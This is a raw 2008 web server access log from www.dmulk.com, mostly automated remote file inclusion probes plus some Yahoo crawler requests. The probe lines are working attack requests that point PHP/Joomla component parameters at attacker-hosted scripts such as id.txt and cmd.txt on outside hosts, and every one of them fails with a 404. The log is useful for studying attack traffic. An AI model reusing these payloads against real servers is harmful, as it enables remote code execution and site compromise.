62.220.146.59 - - [26/Feb/2008:06:01:34 -0800] "GET /logs/access_080131.log/components/com_performs/performs.php?mosConfig_absolute_path=http://www.moscowinternationalcircus.com/users/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
62.24.251.240 - - [26/Feb/2008:06:02:46 -0800] "GET /components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.3y3h4ck.org.uk/safeon?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
211.233.7.68 - - [26/Feb/2008:06:02:46 -0800] "GET //doceboCms/class/class.dashboard_cms.php?where_framework=http://www.geocities.com/ntchack/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.dmulk.com"
211.233.7.68 - - [26/Feb/2008:06:02:47 -0800] "GET /logs//doceboCms/class/class.dashboard_cms.php?where_framework=http://www.geocities.com/ntchack/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.dmulk.com"
68.142.212.185 - - [26/Feb/2008:06:03:24 -0800] "GET /retreat1/webcam/retreat1_00663.jpg HTTP/1.0" 200 39128 "-" "Yahoo-MMCrawler/3.x (mms dash mmcrawler dash support at yahoo dash inc dot com)" "www.dmulk.com"
64.22.112.178 - - [26/Feb/2008:06:04:26 -0800] "GET /logs/access_080123.log//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.myphotogenic.com/Customer/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
64.22.112.178 - - [26/Feb/2008:06:04:27 -0800] "GET //modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.myphotogenic.com/Customer/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
64.22.112.178 - - [26/Feb/2008:06:04:29 -0800] "GET /logs//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.myphotogenic.com/Customer/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
222.236.47.176 - - [26/Feb/2008:06:04:34 -0800] "GET /logs/access_080211.log/includes/header.php?systempath=http://www.napopwin.com.tw/mambots/search/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
222.236.47.176 - - [26/Feb/2008:06:04:36 -0800] "GET /logs/includes/header.php?systempath=http://www.napopwin.com.tw/mambots/search/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
68.142.212.185 - - [26/Feb/2008:06:04:36 -0800] "GET /retreat1/webcam/retreat1_00944.jpg HTTP/1.0" 200 34703 "-" "Yahoo-MMCrawler/3.x (mms dash mmcrawler dash support at yahoo dash inc dot com)" "www.dmulk.com"
165.138.51.94 - - [26/Feb/2008:06:05:15 -0800] "GET /logs/access_071228.log//skin/zero_vote/error.php?dir=http://www.sonarama.com/1.0/cache/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
68.142.212.185 - - [26/Feb/2008:06:05:47 -0800] "GET /retreat1/webcam/retreat1_00623.jpg HTTP/1.0" 200 15408 "-" "Yahoo-MMCrawler/3.x (mms dash mmcrawler dash support at yahoo dash inc dot com)" "www.dmulk.com"
74.6.24.71 - - [26/Feb/2008:06:06:13 -0800] "GET /logs/access_070908.log HTTP/1.0" 200 91498 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
68.142.212.185 - - [26/Feb/2008:06:06:32 -0800] "GET /retreat1/webcam/retreat1_00987.jpg HTTP/1.0" 200 51800 "-" "Yahoo-MMCrawler/3.x (mms dash mmcrawler dash support at yahoo dash inc dot com)" "www.dmulk.com"
68.142.212.185 - - [26/Feb/2008:06:07:13 -0800] "GET /retreat1/webcam/retreat1_00817.jpg HTTP/1.0" 200 49189 "-" "Yahoo-MMCrawler/3.x (mms dash mmcrawler dash support at yahoo dash inc dot com)" "www.dmulk.com"
66.45.242.50 - - [26/Feb/2008:06:07:45 -0800] "GET /logs//claroline/tracking/userLog.php?rootSys=http://cct.vg/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.1)" "www.dmulk.com"
66.45.242.50 - - [26/Feb/2008:06:07:45 -0800] "GET //claroline/tracking/userLog.php?rootSys=http://cct.vg/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.1)" "www.dmulk.com"
68.142.212.185 - - [26/Feb/2008:06:07:53 -0800] "GET /retreat1/webcam/retreat1_00745.jpg HTTP/1.0" 200 16212 "-" "Yahoo-MMCrawler/3.x (mms dash mmcrawler dash support at yahoo dash inc dot com)" "www.dmulk.com"
68.142.212.185 - - [26/Feb/2008:06:08:35 -0800] "GET /retreat1/webcam/retreat1_00404.jpg HTTP/1.0" 304 - "-" "Yahoo-MMCrawler/3.x (mms dash mmcrawler dash support at yahoo dash inc dot com)" "www.dmulk.com"
216.246.90.123 - - [26/Feb/2008:06:08:36 -0800] "GET /logs/access_080126.log//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.lwawrestling.com/plugins/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
68.142.212.185 - - [26/Feb/2008:06:09:14 -0800] "GET /retreat1/webcam/retreat1_00914.jpg HTTP/1.0" 200 16854 "-" "Yahoo-MMCrawler/3.x (mms dash mmcrawler dash support at yahoo dash inc dot com)" "www.dmulk.com"
213.203.223.59 - - [26/Feb/2008:06:09:31 -0800] "GET /logs/access_080211.log/includes/header.php?systempath=http://elurbano.com/elurbano/administrator/components/com_typedcontent/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.203.223.59 - - [26/Feb/2008:06:09:31 -0800] "GET /includes/header.php?systempath=http://elurbano.com/elurbano/administrator/components/com_typedcontent/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.203.223.59 - - [26/Feb/2008:06:09:31 -0800] "GET /logs/includes/header.php?systempath=http://elurbano.com/elurbano/administrator/components/com_typedcontent/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
77.37.15.210 - - [26/Feb/2008:06:10:23 -0800] "GET /logs//components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.abi-ergo-sum.de/cms/components/com_galleria/upload/cmd7.gif??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.dmulk.com"
77.37.15.210 - - [26/Feb/2008:06:10:26 -0800] "GET //components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.abi-ergo-sum.de/cms/components/com_galleria/upload/cmd7.gif??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.dmulk.com"
64.22.112.178 - - [26/Feb/2008:06:10:42 -0800] "GET /logs/access_080126.log//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.lwawrestling.com/plugins/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
213.203.223.59 - - [26/Feb/2008:06:11:22 -0800] "GET /logs/access_080131.log/sohoadmin/program/modules/mods_full/shopping_cart/includes/login.php?_SESSION[docroot_path]=http://elurbano.com/elurbano/administrator/components/com_typedcontent/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.203.223.59 - - [26/Feb/2008:06:11:22 -0800] "GET /sohoadmin/program/modules/mods_full/shopping_cart/includes/login.php?_SESSION[docroot_path]=http://elurbano.com/elurbano/administrator/components/com_typedcontent/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.203.223.59 - - [26/Feb/2008:06:11:23 -0800] "GET /logs/sohoadmin/program/modules/mods_full/shopping_cart/includes/login.php?_SESSION[docroot_path]=http://elurbano.com/elurbano/administrator/components/com_typedcontent/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
66.96.80.31 - - [26/Feb/2008:06:11:26 -0800] "GET /logs/access_080126.log//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.geocities.com/kawats/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
68.142.212.185 - - [26/Feb/2008:06:11:43 -0800] "GET /retreat1/webcam/retreat1_00605.jpg HTTP/1.0" 200 15516 "-" "Yahoo-MMCrawler/3.x (mms dash mmcrawler dash support at yahoo dash inc dot com)" "www.dmulk.com"
222.135.109.228 - - [26/Feb/2008:06:11:47 -0800] "GET /logs/access.log/components/com_performs/performs.php?mosConfig_absolute_path=http://www.koreandentists.org/bbs//data1/alba.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
222.135.109.228 - - [26/Feb/2008:06:11:48 -0800] "GET /logs/components/com_performs/performs.php?mosConfig_absolute_path=http://www.koreandentists.org/bbs//data1/alba.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.6.23.138 - - [26/Feb/2008:06:12:34 -0800] "GET /logs/access_080211.log HTTP/1.0" 200 655360 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
213.203.223.59 - - [26/Feb/2008:06:12:57 -0800] "GET /logs/access_080120.log/sohoadmin/program/modules/mods_full/shopping_cart/includes/login.php?_SESSION[docroot_path]=http://elurbano.com/elurbano/administrator/components/com_typedcontent/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
212.175.17.98 - - [26/Feb/2008:06:13:05 -0800] "GET /logs//Neos_Chronos/header.php?base_folder=http://www.oldcommonwealth.com/safe1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
212.175.17.98 - - [26/Feb/2008:06:13:06 -0800] "GET //Neos_Chronos/header.php?base_folder=http://www.oldcommonwealth.com/safe1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
193.136.6.38 - - [26/Feb/2008:06:13:21 -0800] "GET //index.php?skin_file=http://www.avsvpt.org/phpBB2/templates/fisubsilversh/admin/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.8) Gecko/20050511" "www.dmulk.com"
193.136.6.38 - - [26/Feb/2008:06:13:22 -0800] "GET /logs//index.php?skin_file=http://www.avsvpt.org/phpBB2/templates/fisubsilversh/admin/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.8) Gecko/20050511" "www.dmulk.com"
77.37.15.210 - - [26/Feb/2008:06:13:35 -0800] "GET /logs//components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.abi-ergo-sum.de/cms/components/com_galleria/upload/cmd7.gif??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.dmulk.com"
77.37.15.210 - - [26/Feb/2008:06:13:35 -0800] "GET //components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.abi-ergo-sum.de/cms/components/com_galleria/upload/cmd7.gif??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.dmulk.com"
208.69.192.133 - - [26/Feb/2008:06:13:50 -0800] "GET //components/com_simpleboard/image_upload.php?sbp=http://www.kitchen-counter-tops.net/mambots/editors/tmedit/lang/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
208.69.192.133 - - [26/Feb/2008:06:13:52 -0800] "GET //components/com_simpleboard/image_upload.php?sbp=http://www.kitchen-counter-tops.net/mambots/editors/tmedit/lang/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
81.208.74.177 - - [26/Feb/2008:06:16:00 -0800] "GET //modules/xfsection/modify.php?dir_module=http://www.tuttoscemo.com/administrator/components/com_juser/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
68.76.31.154 - - [26/Feb/2008:06:16:54 -0800] "GET /logs/access_080107.log//Neos_Chronos/header.php?base_folder=http://geocities.com/kawats/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
68.76.31.154 - - [26/Feb/2008:06:16:55 -0800] "GET //Neos_Chronos/header.php?base_folder=http://geocities.com/kawats/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
194.79.75.195 - - [26/Feb/2008:06:17:25 -0800] "GET /logs/access_080118.log/index.php?option=com_joomlalib&Itemid=&mosConfig_absolute_path=http://www.j-vision.co.kr/company/rhe/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
194.79.75.195 - - [26/Feb/2008:06:17:25 -0800] "GET /logs/index.php?option=com_joomlalib&Itemid=&mosConfig_absolute_path=http://www.j-vision.co.kr/company/rhe/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
194.79.75.195 - - [26/Feb/2008:06:17:26 -0800] "GET /logs/access_080122.log/index.php?option=com_joomlalib&Itemid=&mosConfig_absolute_path=http://www.j-vision.co.kr/company/rhe/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
72.36.191.42 - - [26/Feb/2008:06:17:29 -0800] "GET //components/com_simpleboard/image_upload.php?sbp=http://www.kitchen-counter-tops.net/mambots/editors/tmedit/lang/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
72.36.191.42 - - [26/Feb/2008:06:17:36 -0800] "GET //components/com_simpleboard/image_upload.php?sbp=http://www.kitchen-counter-tops.net/mambots/editors/tmedit/lang/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
218.50.53.151 - - [26/Feb/2008:06:17:56 -0800] "GET /logs//Neos_Chronos/header.php?base_folder=http://www.oldcommonwealth.com/safe1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
218.50.53.151 - - [26/Feb/2008:06:17:57 -0800] "GET //Neos_Chronos/header.php?base_folder=http://www.oldcommonwealth.com/safe1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
193.136.6.38 - - [26/Feb/2008:06:18:11 -0800] "GET /store//classes/phpmailer/class.cs_phpmailer.php?classes_dir=http://www.avsvpt.org/phpBB2/templates/fisubsilversh/admin/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.8) Gecko/20050511" "www.dmulk.com"
193.136.6.38 - - [26/Feb/2008:06:18:11 -0800] "GET /logs/store//classes/phpmailer/class.cs_phpmailer.php?classes_dir=http://www.avsvpt.org/phpBB2/templates/fisubsilversh/admin/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.8) Gecko/20050511" "www.dmulk.com"
66.246.218.239 - - [26/Feb/2008:06:19:02 -0800] "GET //faqsupport/samplefaqsupport.php?path[docroot]=http://angel.yum.pl/joomla/images/borda.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
67.195.58.172 - - [26/Feb/2008:06:19:11 -0800] "GET /logs/access_080131.log HTTP/1.0" 304 - "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
77.37.15.210 - - [26/Feb/2008:06:19:17 -0800] "GET //components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.abi-ergo-sum.de/cms/components/com_galleria/upload/cmd7.gif??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.dmulk.com"
77.37.15.210 - - [26/Feb/2008:06:19:17 -0800] "GET /logs//components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.abi-ergo-sum.de/cms/components/com_galleria/upload/cmd7.gif??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.dmulk.com"
216.113.192.99 - - [26/Feb/2008:06:19:36 -0800] "GET /logs/access_080119.log/index.php3?pag=http://www.shearmanmitchell.com//design/components/com_logout/xx.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.68" "www.dmulk.com"
216.113.192.99 - - [26/Feb/2008:06:19:36 -0800] "GET /index.php3?pag=http://www.shearmanmitchell.com//design/components/com_logout/xx.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.68" "www.dmulk.com"
216.113.192.99 - - [26/Feb/2008:06:19:37 -0800] "GET /logs/index.php3?pag=http://www.shearmanmitchell.com//design/components/com_logout/xx.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.68" "www.dmulk.com"
216.113.192.99 - - [26/Feb/2008:06:19:37 -0800] "GET /logs/access_080119.log/index.php3?pag=http://www.shearmanmitchell.com//design/components/com_logout/xx.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.68" "www.dmulk.com"
216.113.192.99 - - [26/Feb/2008:06:19:37 -0800] "GET /index.php3?pag=http://www.shearmanmitchell.com//design/components/com_logout/xx.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.68" "www.dmulk.com"
216.113.192.99 - - [26/Feb/2008:06:19:37 -0800] "GET /logs/access_080119.log/index.php3?pag=http://www.shearmanmitchell.com//design/components/com_logout/php.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.68" "www.dmulk.com"
216.113.192.99 - - [26/Feb/2008:06:19:37 -0800] "GET /logs/index.php3?pag=http://www.shearmanmitchell.com//design/components/com_logout/xx.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.68" "www.dmulk.com"
216.113.192.99 - - [26/Feb/2008:06:19:37 -0800] "GET /index.php3?pag=http://www.shearmanmitchell.com//design/components/com_logout/php.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.68" "www.dmulk.com"
216.113.192.99 - - [26/Feb/2008:06:19:37 -0800] "GET /logs/index.php3?pag=http://www.shearmanmitchell.com//design/components/com_logout/php.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.68" "www.dmulk.com"
216.113.192.99 - - [26/Feb/2008:06:19:40 -0800] "GET /logs/access_080119.log/index.php3?pag=http://www.shearmanmitchell.com//design/components/com_logout/php.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.68" "www.dmulk.com"
216.113.192.99 - - [26/Feb/2008:06:19:40 -0800] "GET /index.php3?pag=http://www.shearmanmitchell.com//design/components/com_logout/php.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.68" "www.dmulk.com"
216.113.192.99 - - [26/Feb/2008:06:19:40 -0800] "GET /logs/index.php3?pag=http://www.shearmanmitchell.com//design/components/com_logout/php.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.68" "www.dmulk.com"
222.236.47.176 - - [26/Feb/2008:06:21:52 -0800] "GET /logs/access_080117.log/sohoadmin/program/modules/mods_full/shopping_cart/includes/login.php?_SESSION[docroot_path]=http://www.napopwin.com.tw/mambots/search/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
222.236.47.176 - - [26/Feb/2008:06:21:53 -0800] "GET /sohoadmin/program/modules/mods_full/shopping_cart/includes/login.php?_SESSION[docroot_path]=http://www.napopwin.com.tw/mambots/search/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
222.236.47.176 - - [26/Feb/2008:06:21:54 -0800] "GET /logs/sohoadmin/program/modules/mods_full/shopping_cart/includes/login.php?_SESSION[docroot_path]=http://www.napopwin.com.tw/mambots/search/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
211.233.7.68 - - [26/Feb/2008:06:22:59 -0800] "GET /logs//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.geocities.com/ntchack/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.dmulk.com"
211.233.7.68 - - [26/Feb/2008:06:22:59 -0800] "GET //components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.geocities.com/ntchack/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.dmulk.com"
64.22.112.178 - - [26/Feb/2008:06:23:05 -0800] "GET /logs/access_080126.log//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.myphotogenic.com/Customer/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
61.100.189.222 - - [26/Feb/2008:06:23:44 -0800] "GET /logs/access.log//doceboCms/class/class.dashboard_cms.php?where_framework=http://www.geocities.com/s3t4n_b4nd3l/idid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
61.100.189.222 - - [26/Feb/2008:06:23:45 -0800] "GET //doceboCms/class/class.dashboard_cms.php?where_framework=http://www.geocities.com/s3t4n_b4nd3l/idid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
61.100.189.222 - - [26/Feb/2008:06:23:45 -0800] "GET /logs//doceboCms/class/class.dashboard_cms.php?where_framework=http://www.geocities.com/s3t4n_b4nd3l/idid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
165.138.51.94 - - [26/Feb/2008:06:23:47 -0800] "GET /logs/access_080211.log//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.sonarama.com/1.0/cache/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
165.138.51.94 - - [26/Feb/2008:06:23:47 -0800] "GET //modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.sonarama.com/1.0/cache/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
165.138.51.94 - - [26/Feb/2008:06:23:47 -0800] "GET /logs//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.sonarama.com/1.0/cache/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
165.138.51.94 - - [26/Feb/2008:06:23:47 -0800] "GET /logs/access_080117.log//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.sonarama.com/1.0/cache/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
208.69.192.133 - - [26/Feb/2008:06:24:06 -0800] "GET /logs/access.log//components/com_simpleboard/image_upload.php?sbp=http://www.kitchen-counter-tops.net/mambots/editors/tmedit/lang/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
208.69.192.133 - - [26/Feb/2008:06:24:06 -0800] "GET /logs/access.log//components/com_simpleboard/image_upload.php?sbp=http://www.kitchen-counter-tops.net/mambots/editors/tmedit/lang/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
208.69.192.133 - - [26/Feb/2008:06:24:06 -0800] "GET /logs//components/com_simpleboard/image_upload.php?sbp=http://www.kitchen-counter-tops.net/mambots/editors/tmedit/lang/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
208.69.192.133 - - [26/Feb/2008:06:24:06 -0800] "GET /logs//components/com_simpleboard/image_upload.php?sbp=http://www.kitchen-counter-tops.net/mambots/editors/tmedit/lang/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
193.136.6.38 - - [26/Feb/2008:06:24:17 -0800] "GET /sohoadmin/program/modules/mods_full/shopping_cart/includes/login.php?_SESSION[docroot_path]=http://www.avsvpt.org/phpBB2/templates/fisubsilversh/admin/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.8) Gecko/20050511" "www.dmulk.com"
193.136.6.38 - - [26/Feb/2008:06:24:25 -0800] "GET /logs/sohoadmin/program/modules/mods_full/shopping_cart/includes/login.php?_SESSION[docroot_path]=http://www.avsvpt.org/phpBB2/templates/fisubsilversh/admin/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.8) Gecko/20050511" "www.dmulk.com"
208.116.41.19 - - [26/Feb/2008:06:24:50 -0800] "GET /index.php?incl=http://www.ar-vision.com/z.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
208.116.41.19 - - [26/Feb/2008:06:24:50 -0800] "GET /logs/index.php?incl=http://www.ar-vision.com/z.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
68.76.31.154 - - [26/Feb/2008:06:25:14 -0800] "GET /logs/access_080122.log//Neos_Chronos/header.php?base_folder=http://geocities.com/kawats/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
212.175.17.98 - - [26/Feb/2008:06:25:17 -0800] "GET /logs/access_080107.log//Neos_Chronos/header.php?base_folder=http://www.oldcommonwealth.com/safe1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
222.135.109.228 - - [26/Feb/2008:06:26:25 -0800] "GET /logs/access_080120.log/components/com_performs/performs.php?mosConfig_absolute_path=http://www.koreandentists.org/bbs//data1/alba.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
212.175.17.98 - - [26/Feb/2008:06:26:50 -0800] "GET /logs/access_080122.log//Neos_Chronos/header.php?base_folder=http://www.oldcommonwealth.com/safe1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
205.234.200.223 - - [26/Feb/2008:06:27:15 -0800] "GET /logs/access_080122.log//newspublish/include.php?path%5Bdocroot%5D=http://www.geocities.com/ghanjar.satriani/cdm.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
205.234.200.223 - - [26/Feb/2008:06:27:15 -0800] "GET //newspublish/include.php?path%5Bdocroot%5D=http://www.geocities.com/ghanjar.satriani/cdm.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
205.234.200.223 - - [26/Feb/2008:06:27:16 -0800] "GET /logs//newspublish/include.php?path%5Bdocroot%5D=http://www.geocities.com/ghanjar.satriani/cdm.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
205.234.200.223 - - [26/Feb/2008:06:27:17 -0800] "GET /logs/access_080122.log//newspublish/include.php?path%5Bdocroot%5D=http://www.geocities.com/ghanjar.satriani/cdm.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
205.234.200.223 - - [26/Feb/2008:06:27:17 -0800] "GET //newspublish/include.php?path%5Bdocroot%5D=http://www.geocities.com/ghanjar.satriani/cdm.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
205.234.200.223 - - [26/Feb/2008:06:27:17 -0800] "GET /logs//newspublish/include.php?path%5Bdocroot%5D=http://www.geocities.com/ghanjar.satriani/cdm.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
205.234.200.223 - - [26/Feb/2008:06:27:17 -0800] "GET /logs/access_080122.log//newspublish/include.php?path%5Bdocroot%5D=http://www.geocities.com/ghanjar.satriani/cdm.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
205.234.200.223 - - [26/Feb/2008:06:27:17 -0800] "GET //newspublish/include.php?path%5Bdocroot%5D=http://www.geocities.com/ghanjar.satriani/cdm.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
205.234.200.223 - - [26/Feb/2008:06:27:17 -0800] "GET /logs//newspublish/include.php?path%5Bdocroot%5D=http://www.geocities.com/ghanjar.satriani/cdm.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
208.69.192.133 - - [26/Feb/2008:06:27:31 -0800] "GET /logs/access_080122.log//components/com_simpleboard/image_upload.php?sbp=http://www.kitchen-counter-tops.net/mambots/editors/tmedit/lang/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
208.69.192.133 - - [26/Feb/2008:06:27:32 -0800] "GET /logs/access_080122.log//components/com_simpleboard/image_upload.php?sbp=http://www.kitchen-counter-tops.net/mambots/editors/tmedit/lang/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
218.50.53.151 - - [26/Feb/2008:06:28:15 -0800] "GET /logs/access_080122.log//Neos_Chronos/header.php?base_folder=http://www.oldcommonwealth.com/safe1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
